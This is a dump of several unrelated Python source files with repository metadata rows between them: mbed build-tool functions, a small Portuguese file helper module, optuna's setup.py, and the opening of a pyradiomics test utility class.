inc_dirs_ext = lib.inc_dirs_ext
if type(src_paths) != ListType:
src_paths = [src_paths]
name = basename(src_paths[0])
if report != None:
start = time()
id_name = name.upper()
description = name
vendor_label = target.extra_labels[0]
cur_result = None
prep_report(report, target.name, toolchain_name, id_name)
cur_result = create_result(target.name, toolchain_name, id_name,
description)
if properties != None:
prep_properties(properties, target.name, toolchain_name,
vendor_label)
for src_path in src_paths:
if not exists(src_path):
error_msg = "The library source folder does not exist: %s", src_path
if report != None:
cur_result["output"] = error_msg
cur_result["result"] = "FAIL"
add_result_to_report(report, cur_result)
raise Exception(error_msg)
try:
bin_path = join(build_path, mbed2_obj_path(target.name, toolchain_name))
mkdir(bin_path)
tmp_path = join(build_path, '.temp', mbed2_obj_path(target.name,
toolchain_name))
mkdir(tmp_path)
toolchain = prepare_toolchain(
src_paths, tmp_path, target, toolchain_name, macros=macros,
notify=notify, silent=silent, extra_verbose=extra_verbose,
build_profile=build_profile, jobs=jobs, clean=clean)
toolchain.info("Building library %s (%s, %s)" %
(name.upper(), target.name, toolchain_name))
config = toolchain.config
config.add_config_files([MBED_CONFIG_FILE])
resources = []
for src_path in src_paths:
resources.append(toolchain.scan_resources(src_path))
if inc_dirs_ext is not None:
for inc_ext in inc_dirs_ext:
resources.append(toolchain.scan_resources(inc_ext))
dependencies_include_dir = []
if dependencies_paths is not None:
for path in dependencies_paths:
lib_resources = toolchain.scan_resources(path)
dependencies_include_dir.extend(lib_resources.inc_dirs)
dependencies_include_dir.extend(map(dirname, lib_resources.inc_dirs))
if inc_dirs:
dependencies_include_dir.extend(inc_dirs)
for res in resources:
config.load_resources(res)
toolchain.set_config_data(toolchain.config.get_config_data())
for resource in resources:
toolchain.copy_files(resource.headers, build_path,
resources=resource)
dependencies_include_dir.extend(
toolchain.scan_resources(build_path).inc_dirs)
objects = []
for resource in resources:
objects.extend(toolchain.compile_sources(resource, dependencies_include_dir))
needed_update = toolchain.build_library(objects, bin_path, name)
if report != None and needed_update:
end = time()
cur_result["elapsed_time"] = end - start
cur_result["output"] = toolchain.get_output()
cur_result["result"] = "OK"
add_result_to_report(report, cur_result)
return True
except Exception:
if report != None:
end = time()
cur_result["result"] = "FAIL"
cur_result["elapsed_time"] = end - start
toolchain_output = toolchain.get_output()
if toolchain_output:
cur_result["output"] += toolchain_output
add_result_to_report(report, cur_result)
raise
def build_mbed_libs(target, toolchain_name, verbose=False,
clean=False, macros=None, notify=None, jobs=1, silent=False,
report=None, properties=None, extra_verbose=False,
build_profile=None):
""" Function returns True is library was built and false if building was
skipped
Positional arguments:
target - the MCU or board that the project will compile for
toolchain_name - the name of the build tools
Keyword arguments:
verbose - Write the actual tools command lines used if True
clean - Rebuild everything if True
macros - additional macros
notify - Notify function for logs
jobs - how many compilers we can run at once
silent - suppress printing of progress indicators
report - a dict where a result may be appended
properties - UUUUHHHHH beats me
extra_verbose - even more output!
build_profile - a dict of flags that will be passed to the compiler
"""
if report != None:
start = time()
id_name = "MBED"
description = "mbed SDK"
vendor_label = target.extra_labels[0]
cur_result = None
prep_report(report, target.name, toolchain_name, id_name)
cur_result = create_result(target.name, toolchain_name, id_name,
description)
if properties != None:
prep_properties(properties, target.name, toolchain_name,
vendor_label)
if toolchain_name not in target.supported_toolchains:
supported_toolchains_text = ", ".join(target.supported_toolchains)
print('%s target is not yet supported by toolchain %s' %
(target.name, toolchain_name))
print('%s target supports %s toolchain%s' %
(target.name, supported_toolchains_text, 's'
if len(target.supported_toolchains) > 1 else ''))
if report != None:
cur_result["result"] = "SKIP"
add_result_to_report(report, cur_result)
return False
try:
build_target = join(MBED_LIBRARIES, "TARGET_" + target.name)
build_toolchain = join(MBED_LIBRARIES, mbed2_obj_path(target.name, toolchain_name))
mkdir(build_toolchain)
tmp_path = join(MBED_LIBRARIES, '.temp', mbed2_obj_path(target.name, toolchain_name))
mkdir(tmp_path)
toolchain = prepare_toolchain(
[""], tmp_path, target, toolchain_name, macros=macros,verbose=verbose,
notify=notify, silent=silent, extra_verbose=extra_verbose,
build_profile=build_profile, jobs=jobs, clean=clean)
config = toolchain.config
config.add_config_files([MBED_CONFIG_FILE])
toolchain.set_config_data(toolchain.config.get_config_data())
toolchain.info("Building library %s (%s, %s)" %
('CMSIS', target.name, toolchain_name))
cmsis_src = MBED_CMSIS_PATH
resources = toolchain.scan_resources(cmsis_src)
toolchain.copy_files(resources.headers, build_target)
toolchain.copy_files(resources.linker_script, build_toolchain)
toolchain.copy_files(resources.bin_files, build_toolchain)
objects = toolchain.compile_sources(resources, tmp_path)
toolchain.copy_files(objects, build_toolchain)
toolchain.info("Building library %s (%s, %s)" %
('MBED', target.name, toolchain_name))
toolchain.copy_files([MBED_HEADER], MBED_LIBRARIES)
library_incdirs = [dirname(MBED_LIBRARIES), MBED_LIBRARIES]
for dir, dest in [(MBED_DRIVERS, MBED_LIBRARIES_DRIVERS),
(MBED_PLATFORM, MBED_LIBRARIES_PLATFORM),
(MBED_HAL, MBED_LIBRARIES_HAL)]:
resources = toolchain.scan_resources(dir)
toolchain.copy_files(resources.headers, dest)
library_incdirs.append(dest)
hal_src = MBED_TARGETS_PATH
hal_implementation = toolchain.scan_resources(hal_src)
toolchain.copy_files(hal_implementation.headers +
hal_implementation.hex_files +
hal_implementation.libraries +
[MBED_CONFIG_FILE],
build_target, resources=hal_implementation)
toolchain.copy_files(hal_implementation.linker_script, build_toolchain)
toolchain.copy_files(hal_implementation.bin_files, build_toolchain)
incdirs = toolchain.scan_resources(build_target).inc_dirs
objects = toolchain.compile_sources(hal_implementation,
library_incdirs + incdirs)
toolchain.copy_files(objects, build_toolchain)
mbed_resources = None
for dir in [MBED_DRIVERS, MBED_PLATFORM, MBED_HAL]:
mbed_resources += toolchain.scan_resources(dir)
objects = toolchain.compile_sources(mbed_resources,
library_incdirs + incdirs)
separate_names, separate_objects = ['mbed_retarget.o', 'mbed_board.o',
'mbed_overrides.o', 'mbed_main.o', 'mbed_sdk_boot.o'], []
for obj in objects:
for name in separate_names:
if obj.endswith(name):
separate_objects.append(obj)
for obj in separate_objects:
objects.remove(obj)
toolchain.build_library(objects, build_toolchain, "mbed")
for obj in separate_objects:
toolchain.copy_files(obj, build_toolchain)
if report != None:
end = time()
cur_result["elapsed_time"] = end - start
cur_result["output"] = toolchain.get_output()
cur_result["result"] = "OK"
add_result_to_report(report, cur_result)
return True
except Exception as exc:
if report != None:
end = time()
cur_result["result"] = "FAIL"
cur_result["elapsed_time"] = end - start
toolchain_output = toolchain.get_output()
if toolchain_output:
cur_result["output"] += toolchain_output
cur_result["output"] += str(exc)
add_result_to_report(report, cur_result)
raise
def get_unique_supported_toolchains(release_targets=None):
""" Get list of all unique toolchains supported by targets
Keyword arguments:
release_targets - tuple structure returned from get_mbed_official_release().
If release_targets is not specified, then it queries all
known targets
"""
unique_supported_toolchains = []
if not release_targets:
for target in TARGET_NAMES:
for toolchain in TARGET_MAP[target].supported_toolchains:
if toolchain not in unique_supported_toolchains:
unique_supported_toolchains.append(toolchain)
else:
for target in release_targets:
for toolchain in target[1]:
if toolchain not in unique_supported_toolchains:
unique_supported_toolchains.append(toolchain)
if "ARM" in unique_supported_toolchains:
unique_supported_toolchains.append("ARMC6")
return unique_supported_toolchains
def mcu_toolchain_list(release_version='5'):
""" Shows list of toolchains
"""
if isinstance(release_version, basestring):
release_version = release_version.lower()
else:
release_version = 'all'
version_release_targets = {}
version_release_target_names = {}
for version in RELEASE_VERSIONS:
version_release_targets[version] = get_mbed_official_release(version)
version_release_target_names[version] = [x[0] for x in
version_release_targets[
version]]
if release_version in RELEASE_VERSIONS:
release_targets = version_release_targets[release_version]
else:
release_targets = None
unique_supported_toolchains = get_unique_supported_toolchains(
release_targets)
columns = ["mbed OS %s" % x for x in RELEASE_VERSIONS] + unique_supported_toolchains
return "\n".join(columns)
def mcu_target_list(release_version='5'):
""" Shows target list
"""
if isinstance(release_version, basestring):
release_version = release_version.lower()
else:
release_version = 'all'
version_release_targets = {}
version_release_target_names = {}
for version in RELEASE_VERSIONS:
version_release_targets[version] = get_mbed_official_release(version)
version_release_target_names[version] = [x[0] for x in
version_release_targets[
version]]
if release_version in RELEASE_VERSIONS:
release_targets = version_release_targets[release_version]
else:
release_targets = None
target_names = []
if release_targets:
target_names = [x[0] for x in release_targets]
else:
target_names = TARGET_NAMES
return "\n".join(target_names)
def mcu_toolchain_matrix(verbose_html=False, platform_filter=None,
release_version='5'):
""" Shows target map using prettytable
Keyword arguments:
verbose_html - emit html instead of a simple table
platform_filter - remove results that match the string
release_version - get the matrix for this major version number
"""
from prettytable import PrettyTable
if isinstance(release_version, basestring):
release_version = release_version.lower()
else:
release_version = 'all'
version_release_targets = {}
version_release_target_names = {}
for version in RELEASE_VERSIONS:
version_release_targets[version] = get_mbed_official_release(version)
version_release_target_names[version] = [x[0] for x in
version_release_targets[
version]]
if release_version in RELEASE_VERSIONS:
release_targets = version_release_targets[release_version]
else:
release_targets = None
unique_supported_toolchains = get_unique_supported_toolchains(
release_targets)
prepend_columns = ["Target"] + ["mbed OS %s" % x for x in RELEASE_VERSIONS]
columns = prepend_columns + unique_supported_toolchains
table_printer = PrettyTable(columns)
for col in columns:
table_printer.align[col] = "c"
table_printer.align["Target"] = "l"
perm_counter = 0
target_counter = 0
target_names = []
if release_targets:
target_names = [x[0] for x in release_targets]
else:
target_names = TARGET_NAMES
for target in sorted(target_names):
if platform_filter is not None:
if re.search(platform_filter, target) is None:
continue
target_counter += 1
row = [target]
for version in RELEASE_VERSIONS:
if target in version_release_target_names[version]:
text = "Supported"
else:
text = "-"
row.append(text)
for unique_toolchain in unique_supported_toolchains:
if (unique_toolchain in TARGET_MAP[target].supported_toolchains or
(unique_toolchain == "ARMC6" and
"ARM" in TARGET_MAP[target].supported_toolchains)):
text = "Supported"
perm_counter += 1
else:
text = "-"
row.append(text)
table_printer.add_row(row)
result = table_printer.get_html_string() if verbose_html \
else table_printer.get_string()
result += "\n"
result += "Supported targets: %d\n"% (target_counter)
if target_counter == 1:
result += "Supported toolchains: %d"% (perm_counter)
return result
def get_target_supported_toolchains(target):
""" Returns target supported toolchains list
Positional arguments:
target - the target to get the supported toolchains of
"""
return TARGET_MAP[target].supported_toolchains if target in TARGET_MAP \
else None
def print_build_results(result_list, build_name):
""" Generate result string for build results
Positional arguments:
result_list - the list of results to print
build_name - the name of the build we are printing result for
"""
result = ""
if len(result_list) > 0:
result += build_name + "\n"
result += "\n".join([" * %s" % f for f in result_list])
result += "\n"
return result
def print_build_memory_usage(report):
""" Generate result table with memory usage values for build results
Aggregates (puts together) reports obtained from self.get_memory_summary()
Positional arguments:
report - Report generated during build procedure.
"""
from prettytable import PrettyTable
columns_text = ['name', 'target', 'toolchain']
columns_int = ['static_ram', 'total_flash']
table = PrettyTable(columns_text + columns_int)
for col in columns_text:
table.align[col] = 'l'
for col in columns_int:
table.align[col] = 'r'
for target in report:
for toolchain in report[target]:
for name in report[target][toolchain]:
for dlist in report[target][toolchain][name]:
for dlistelem in dlist:
record = dlist[dlistelem]
if 'memory_usage' in record and record['memory_usage']:
row = [
record['description'],
record['target_name'],
record['toolchain_name'],
record['memory_usage'][-1]['summary'][
'static_ram'],
record['memory_usage'][-1]['summary'][
'total_flash'],
]
table.add_row(row)
result = "Memory map breakdown for built projects (values in Bytes):\n"
result += table.get_string(sortby='name')
return result
def write_build_report(build_report, template_filename, filename):
"""Write a build report to disk using a template file
Positional arguments:
build_report - a report generated by the build system
template_filename - a file that contains the template for the style of build
report
filename - the location on disk to write the file to
"""
build_report_failing = []
build_report_passing = []
for report in build_report:
if len(report["failing"]) > 0:
build_report_failing.append(report)
else:
build_report_passing.append(report)
env = Environment(extensions=['jinja2.ext.with_'])
env.loader = FileSystemLoader('ci_templates')
template = env.get_template(template_filename)
with open(filename, 'w+') as placeholder:
placeholder.write(template.render(
failing_builds=build_report_failing,
passing_builds=build_report_passing))
def merge_build_data(filename, toolchain_report, app_type):
path_to_file = dirname(abspath(filename))
try:
build_data = load(open(filename))
except (IOError, ValueError):
build_data = {'builds': []}
for tgt in toolchain_report.values():
for tc in tgt.values():
for project in tc.values():
for build in project:
try:
build[0]['elf'] = relpath(build[0]['elf'], path_to_file)
build[0]['bin'] = relpath(build[0]['bin'], path_to_file)
except KeyError:
pass
if 'type' not in build[0]:
build[0]['type'] = app_type
build_data['builds'].append(build[0])
dump(build_data, open(filename, "wb"), indent=4, separators=(',', ': '))
| false
| true
|
790b1bcd69de3a7ca25a03a56710c8f20a956051
| 1,088
|
py
|
Python
|
bibli/arquivo/__init__.py
|
EduardoPessanha/Python
|
ac248a14288da2dd9c482afea30468c21db5460f
|
[
"MIT"
] | null | null | null |
bibli/arquivo/__init__.py
|
EduardoPessanha/Python
|
ac248a14288da2dd9c482afea30468c21db5460f
|
[
"MIT"
] | 1
|
2021-11-16T16:12:41.000Z
|
2021-11-16T16:15:08.000Z
|
bibli/arquivo/__init__.py
|
EduardoPessanha/Python
|
ac248a14288da2dd9c482afea30468c21db5460f
|
[
"MIT"
] | null | null | null |
def testaArq(arq):
"""
-> Verifica se existe o arquivo arq
:arq: Nome do arquivo a ser testado.
:return: retorna True se o arquivo for encontrado,
caso contrário False
"""
try:
a = open(arq)
except FileNotFoundError: # O arquivo não foi encontrado
print('Arquivo não encontrado!')
return False
else:
return True
def criaArq(arq=''):
"""
-> Cria um arquivo de texto, caso ele não exista.
:param arq: Nome do arquivo.
:return:
"""
try:
a = open(arq, 'xt')
except FileExistsError:
print(f'ERRO: o arquivo \"{arq}\" já existe!')
else:
print(f'O arquivo \"{arq}\" foi criado com sucesso!')
finally:
a.close()
return
def leArq(arq=''):
"""
-> Abre e mostra os itens de um arquivo texto.
:param arq: Nome do arquivo.
:return:
"""
return
def editaArq(arq):
"""
-> Abre um arquivo de texto e adiciona novo item no
final do arquivo.
:param arq: Nome do arquivo.
:return:
"""
return
| 21.333333
| 61
| 0.560662
|
def testaArq(arq):
try:
a = open(arq)
except FileNotFoundError:
print('Arquivo não encontrado!')
return False
else:
return True
def criaArq(arq=''):
try:
a = open(arq, 'xt')
except FileExistsError:
print(f'ERRO: o arquivo \"{arq}\" já existe!')
else:
print(f'O arquivo \"{arq}\" foi criado com sucesso!')
finally:
a.close()
return
def leArq(arq=''):
return
def editaArq(arq):
return
| true
| true
|
790b1c298f3504e67b502f6aa388aaf3fd5051a2
| 7,862
|
py
|
Python
|
setup.py
|
PhilipMay/optuna
|
81840c2e08f452bd5ac959afaca0fee006bdb44e
|
[
"MIT"
] | null | null | null |
setup.py
|
PhilipMay/optuna
|
81840c2e08f452bd5ac959afaca0fee006bdb44e
|
[
"MIT"
] | null | null | null |
setup.py
|
PhilipMay/optuna
|
81840c2e08f452bd5ac959afaca0fee006bdb44e
|
[
"MIT"
] | null | null | null |
import os
import sys
from typing import Dict
from typing import List
from typing import Optional
import pkg_resources
from setuptools import find_packages
from setuptools import setup
def get_version() -> str:
version_filepath = os.path.join(os.path.dirname(__file__), "optuna", "version.py")
with open(version_filepath) as f:
for line in f:
if line.startswith("__version__"):
return line.strip().split()[-1][1:-1]
assert False
def get_long_description() -> str:
readme_filepath = os.path.join(os.path.dirname(__file__), "README.md")
with open(readme_filepath) as f:
return f.read()
def get_install_requires() -> List[str]:
return [
"alembic",
"cliff",
"cmaes>=0.6.0",
"colorlog",
"joblib",
"numpy",
"packaging>=20.0",
"scipy!=1.4.0",
"sqlalchemy>=1.1.0",
"tqdm",
]
def get_tests_require() -> List[str]:
return get_extras_require()["testing"]
def get_extras_require() -> Dict[str, List[str]]:
requirements = {
"checking": ["black", "hacking", "isort", "mypy==0.782", "blackdoc"],
"codecov": ["codecov", "pytest-cov"],
"doctest": [
"cma",
"matplotlib>=3.0.0",
"pandas",
"plotly>=4.0.0",
"scikit-learn>=0.19.0,<0.23.0",
"scikit-optimize",
"mlflow",
],
"document": [
# TODO(hvy): Unpin `sphinx` version after:
# https://github.com/sphinx-doc/sphinx/issues/8105.
"sphinx==3.0.4",
# As reported in: https://github.com/readthedocs/sphinx_rtd_theme/issues/949,
# `sphinx_rtd_theme` 0.5.0 is still not compatible with `sphinx` >= 3.0.
"sphinx_rtd_theme<0.5.0",
"sphinx-gallery",
"sphinx-plotly-directive",
"pillow",
"matplotlib",
"scikit-learn",
],
"example": [
"catboost",
"chainer",
"lightgbm",
"mlflow",
"mpi4py",
"mxnet",
"nbval",
"scikit-image",
"scikit-learn>=0.19.0,<0.23.0", # optuna/visualization/param_importances.py.
"xgboost",
"keras",
"tensorflow>=2.0.0",
"tensorflow-datasets",
"pytorch-ignite",
"pytorch-lightning>=0.8.1",
"thop",
"skorch",
"stable-baselines3>=0.7.0",
"catalyst",
]
+ (
["torch==1.7.0", "torchvision==0.8.1", "torchaudio==0.7.0"]
if sys.platform == "darwin"
else ["torch==1.7.0+cpu", "torchvision==0.8.1+cpu", "torchaudio==0.7.0"]
)
+ (
[
"allennlp==1.2.0",
"fastai<2",
"dask[dataframe]",
"dask-ml",
]
if sys.version_info[:2] < (3, 8)
else []
),
"experimental": ["redis"],
"testing": [
# TODO(toshihikoyanase): Remove the version constraint after resolving the issue
# https://github.com/optuna/optuna/issues/1000.
"bokeh<2.0.0",
"chainer>=5.0.0",
"cma",
"fakeredis",
"lightgbm",
"matplotlib>=3.0.0",
"mlflow",
"mpi4py",
"mxnet",
"pandas",
"plotly>=4.0.0",
"pytest",
"scikit-learn>=0.19.0,<0.23.0",
"scikit-optimize",
"xgboost",
"keras",
"tensorflow",
"tensorflow-datasets",
"pytorch-ignite",
"pytorch-lightning>=0.8.1",
"skorch",
"catalyst",
]
+ (
["torch==1.7.0", "torchvision==0.8.1", "torchaudio==0.7.0"]
if sys.platform == "darwin"
else ["torch==1.7.0+cpu", "torchvision==0.8.1+cpu", "torchaudio==0.7.0"]
)
+ (["allennlp==1.2.0", "fastai<2"] if sys.version_info[:2] < (3, 8) else []),
"tests": ["fakeredis", "pytest"],
"optional": [
"bokeh<2.0.0", # optuna/cli.py, optuna/dashboard.py.
"matplotlib>=3.0.0", # optuna/visualization/matplotlib
"pandas", # optuna/study.py
"plotly>=4.0.0", # optuna/visualization.
"redis", # optuna/storages/redis.py.
"scikit-learn>=0.19.0,<0.23.0", # optuna/visualization/param_importances.py.
],
"integration": [
# TODO(toshihikoyanase): Remove the version constraint after resolving the issue
# https://github.com/optuna/optuna/issues/1000.
"chainer>=5.0.0",
"cma",
"lightgbm",
"mlflow",
"mpi4py",
"mxnet",
"pandas",
"scikit-learn>=0.19.0,<0.23.0",
"scikit-optimize",
"xgboost",
"keras",
"tensorflow",
"tensorflow-datasets",
"pytorch-ignite",
"pytorch-lightning>=0.8.1",
"skorch",
"catalyst",
]
+ (
["torch==1.7.0", "torchvision==0.8.1", "torchaudio==0.7.0"]
if sys.platform == "darwin"
else ["torch==1.7.0+cpu", "torchvision==0.8.1+cpu", "torchaudio==0.7.0"]
)
+ (["allennlp==1.2.0", "fastai<2"] if sys.version_info[:2] < (3, 8) else []),
}
return requirements
def find_any_distribution(pkgs: List[str]) -> Optional[pkg_resources.Distribution]:
for pkg in pkgs:
try:
return pkg_resources.get_distribution(pkg)
except pkg_resources.DistributionNotFound:
pass
return None
setup(
name="optuna",
version=get_version(),
description="A hyperparameter optimization framework",
long_description=get_long_description(),
long_description_content_type="text/markdown",
author="Takuya Akiba",
author_email="akiba@preferred.jp",
url="https://optuna.org/",
packages=find_packages(),
package_data={
"optuna": [
"storages/_rdb/alembic.ini",
"storages/_rdb/alembic/*.*",
"storages/_rdb/alembic/versions/*.*",
"py.typed",
]
},
python_requires=">=3.6",
install_requires=get_install_requires(),
tests_require=get_tests_require(),
extras_require=get_extras_require(),
entry_points={
"console_scripts": ["optuna = optuna.cli:main"],
"optuna.command": [
"create-study = optuna.cli:_CreateStudy",
"delete-study = optuna.cli:_DeleteStudy",
"study set-user-attr = optuna.cli:_StudySetUserAttribute",
"studies = optuna.cli:_Studies",
"dashboard = optuna.cli:_Dashboard",
"study optimize = optuna.cli:_StudyOptimize",
"storage upgrade = optuna.cli:_StorageUpgrade",
],
},
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Science/Research",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3 :: Only",
"Topic :: Scientific/Engineering",
"Topic :: Scientific/Engineering :: Mathematics",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Topic :: Software Development",
"Topic :: Software Development :: Libraries",
"Topic :: Software Development :: Libraries :: Python Modules",
],
)
| 31.574297
| 92
| 0.512338
|
import os
import sys
from typing import Dict
from typing import List
from typing import Optional
import pkg_resources
from setuptools import find_packages
from setuptools import setup
def get_version() -> str:
version_filepath = os.path.join(os.path.dirname(__file__), "optuna", "version.py")
with open(version_filepath) as f:
for line in f:
if line.startswith("__version__"):
return line.strip().split()[-1][1:-1]
assert False
def get_long_description() -> str:
readme_filepath = os.path.join(os.path.dirname(__file__), "README.md")
with open(readme_filepath) as f:
return f.read()
def get_install_requires() -> List[str]:
return [
"alembic",
"cliff",
"cmaes>=0.6.0",
"colorlog",
"joblib",
"numpy",
"packaging>=20.0",
"scipy!=1.4.0",
"sqlalchemy>=1.1.0",
"tqdm",
]
def get_tests_require() -> List[str]:
return get_extras_require()["testing"]
def get_extras_require() -> Dict[str, List[str]]:
requirements = {
"checking": ["black", "hacking", "isort", "mypy==0.782", "blackdoc"],
"codecov": ["codecov", "pytest-cov"],
"doctest": [
"cma",
"matplotlib>=3.0.0",
"pandas",
"plotly>=4.0.0",
"scikit-learn>=0.19.0,<0.23.0",
"scikit-optimize",
"mlflow",
],
"document": [
"sphinx==3.0.4",
"sphinx_rtd_theme<0.5.0",
"sphinx-gallery",
"sphinx-plotly-directive",
"pillow",
"matplotlib",
"scikit-learn",
],
"example": [
"catboost",
"chainer",
"lightgbm",
"mlflow",
"mpi4py",
"mxnet",
"nbval",
"scikit-image",
"scikit-learn>=0.19.0,<0.23.0",
"xgboost",
"keras",
"tensorflow>=2.0.0",
"tensorflow-datasets",
"pytorch-ignite",
"pytorch-lightning>=0.8.1",
"thop",
"skorch",
"stable-baselines3>=0.7.0",
"catalyst",
]
+ (
["torch==1.7.0", "torchvision==0.8.1", "torchaudio==0.7.0"]
if sys.platform == "darwin"
else ["torch==1.7.0+cpu", "torchvision==0.8.1+cpu", "torchaudio==0.7.0"]
)
+ (
[
"allennlp==1.2.0",
"fastai<2",
"dask[dataframe]",
"dask-ml",
]
if sys.version_info[:2] < (3, 8)
else []
),
"experimental": ["redis"],
"testing": [
"bokeh<2.0.0",
"chainer>=5.0.0",
"cma",
"fakeredis",
"lightgbm",
"matplotlib>=3.0.0",
"mlflow",
"mpi4py",
"mxnet",
"pandas",
"plotly>=4.0.0",
"pytest",
"scikit-learn>=0.19.0,<0.23.0",
"scikit-optimize",
"xgboost",
"keras",
"tensorflow",
"tensorflow-datasets",
"pytorch-ignite",
"pytorch-lightning>=0.8.1",
"skorch",
"catalyst",
]
+ (
["torch==1.7.0", "torchvision==0.8.1", "torchaudio==0.7.0"]
if sys.platform == "darwin"
else ["torch==1.7.0+cpu", "torchvision==0.8.1+cpu", "torchaudio==0.7.0"]
)
+ (["allennlp==1.2.0", "fastai<2"] if sys.version_info[:2] < (3, 8) else []),
"tests": ["fakeredis", "pytest"],
"optional": [
"bokeh<2.0.0",
"matplotlib>=3.0.0",
"pandas",
"plotly>=4.0.0",
"redis",
"scikit-learn>=0.19.0,<0.23.0",
],
"integration": [
"chainer>=5.0.0",
"cma",
"lightgbm",
"mlflow",
"mpi4py",
"mxnet",
"pandas",
"scikit-learn>=0.19.0,<0.23.0",
"scikit-optimize",
"xgboost",
"keras",
"tensorflow",
"tensorflow-datasets",
"pytorch-ignite",
"pytorch-lightning>=0.8.1",
"skorch",
"catalyst",
]
+ (
["torch==1.7.0", "torchvision==0.8.1", "torchaudio==0.7.0"]
if sys.platform == "darwin"
else ["torch==1.7.0+cpu", "torchvision==0.8.1+cpu", "torchaudio==0.7.0"]
)
+ (["allennlp==1.2.0", "fastai<2"] if sys.version_info[:2] < (3, 8) else []),
}
return requirements
def find_any_distribution(pkgs: List[str]) -> Optional[pkg_resources.Distribution]:
for pkg in pkgs:
try:
return pkg_resources.get_distribution(pkg)
except pkg_resources.DistributionNotFound:
pass
return None
setup(
name="optuna",
version=get_version(),
description="A hyperparameter optimization framework",
long_description=get_long_description(),
long_description_content_type="text/markdown",
author="Takuya Akiba",
author_email="akiba@preferred.jp",
url="https://optuna.org/",
packages=find_packages(),
package_data={
"optuna": [
"storages/_rdb/alembic.ini",
"storages/_rdb/alembic/*.*",
"storages/_rdb/alembic/versions/*.*",
"py.typed",
]
},
python_requires=">=3.6",
install_requires=get_install_requires(),
tests_require=get_tests_require(),
extras_require=get_extras_require(),
entry_points={
"console_scripts": ["optuna = optuna.cli:main"],
"optuna.command": [
"create-study = optuna.cli:_CreateStudy",
"delete-study = optuna.cli:_DeleteStudy",
"study set-user-attr = optuna.cli:_StudySetUserAttribute",
"studies = optuna.cli:_Studies",
"dashboard = optuna.cli:_Dashboard",
"study optimize = optuna.cli:_StudyOptimize",
"storage upgrade = optuna.cli:_StorageUpgrade",
],
},
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Science/Research",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3 :: Only",
"Topic :: Scientific/Engineering",
"Topic :: Scientific/Engineering :: Mathematics",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Topic :: Software Development",
"Topic :: Software Development :: Libraries",
"Topic :: Software Development :: Libraries :: Python Modules",
],
)
| true
| true
|
790b1cc12df560ef9f4e3ce6bcdbf341f94a9bba
| 14,093
|
py
|
Python
|
tests/testUtils.py
|
drmaxchen/pyradio
|
f2e46856425cfb233d29d391199bfb9b85824b06
|
[
"BSD-3-Clause"
] | 2
|
2020-09-11T01:04:07.000Z
|
2020-09-11T01:35:46.000Z
|
tests/testUtils.py
|
drmaxchen/pyradio
|
f2e46856425cfb233d29d391199bfb9b85824b06
|
[
"BSD-3-Clause"
] | null | null | null |
tests/testUtils.py
|
drmaxchen/pyradio
|
f2e46856425cfb233d29d391199bfb9b85824b06
|
[
"BSD-3-Clause"
] | 1
|
2020-09-11T01:04:46.000Z
|
2020-09-11T01:04:46.000Z
|
import ast
import csv
import logging
import math
import os
from nose_parameterized import parameterized
import numpy
import SimpleITK as sitk
import six
from radiomics import getTestCase, imageoperations
# Get the logger. This is done outside the class, as it is needed by both the class and the custom_name_func
logger = logging.getLogger('radiomics.testing')
TEST_CASES = ('brain1', 'brain2', 'breast1', 'lung1', 'lung2')
def custom_name_func(testcase_func, param_num, param):
"""
A custom test name function that will ensure that the tests are run such that they're batched with all tests for a
given data set are run together, avoiding re-reading the data more than necessary. Tests are run in alphabetical
order, so put the test case first. An alternate option is to right justify the test number (param_num) with zeroes
so that the numerical and alphabetical orders are the same. Not providing this method when there are more than 10
tests results in tests running in an order similar to:
test_*.test_scenario_0_*
test_*.test_scenario_10_*
test_*.test_scenario_11_*
...
test_*.test_scenario_19_*
test_*.test_scenario_1_*
test_*.test_scenario_20_*
"""
global logger
logger.debug('custom_name_func: function name = %s, param_num = {0:0>3}, param.args = %s'.format(param_num),
testcase_func.__name__, param.args)
return str("%s_%s" % (
testcase_func.__name__,
parameterized.to_safe_name("_".join(str(x) for x in param.args)),
))
class RadiomicsTestUtils:
"""
This utility class reads in and stores the baseline files stored in 'data\baseline' (one per feature class)
It provides utility methods to get the baseline feature value for a feature class and compare it to the result generated
by the test.
"""
def __init__(self):
self._logger = logging.getLogger('radiomics.testing.utils')
self._logger.debug('RadiomicsTestUtils')
# the image and mask volumes
self._image = None
self._mask = None
self._current_image = None
self._current_mask = None
self._bb = None
self._imageType = None
# set up file paths
self._dataDir = os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", "data")
self._baselineDir = os.path.join(self._dataDir, 'baseline')
self._tests = set()
self._test = None # Test, specifies an image and mask and some configuration (settings)
self._testCase = None # Test image and mask to use in configured test
self._testedSet = set()
self._baseline = {}
self.readBaselineFiles()
self._current_config = {}
self._featureClassName = None
self._results = {}
self._diffs = {}
for test in self.getTests():
self._results[test] = {}
self._diffs[test] = {}
def readBaselineFiles(self):
"""
Reads the 'baseline' folder contained in dataDir. All files starting with 'baseline_' are read as baseline files.
These files should therefore be named as follows: 'baseline_<className>.csv'.
"""
baselineFiles = [fileName for fileName in os.listdir(self._baselineDir)
if os.path.isfile(os.path.join(self._baselineDir, fileName)) and fileName.startswith('baseline_')]
assert len(baselineFiles) > 0
for baselineFile in baselineFiles:
newBaseline = PyRadiomicsBaseline.readBaselineFile(os.path.join(self._baselineDir, baselineFile))
cls = newBaseline.cls
self._logger.debug('Read baseline for class %s', cls)
self._baseline[cls] = newBaseline
self._tests |= newBaseline.tests
def getTests(self):
"""
Return all the tests for which there are baseline information.
"""
return self._tests
def getFeatureNames(self, className, test):
"""
Gets all features for which a baseline value is available for the current class and test case. Returns a list
containing the feature names (without image type and feature class specifiers, i.e. just the feature name).
"""
if className not in self._baseline:
return None # No baseline available for specified class
return self._baseline[className].getTestFeatures(test)
def setFeatureClassAndTestCase(self, className, test):
"""
Set testing suite to specified testCase and feature class. Throws an assertion error if either class or test case
are not recognized. These have to be set here together, as the settings with which the test case has to be loaded
are defined per feature class in the baseline (extracted from provenance information).
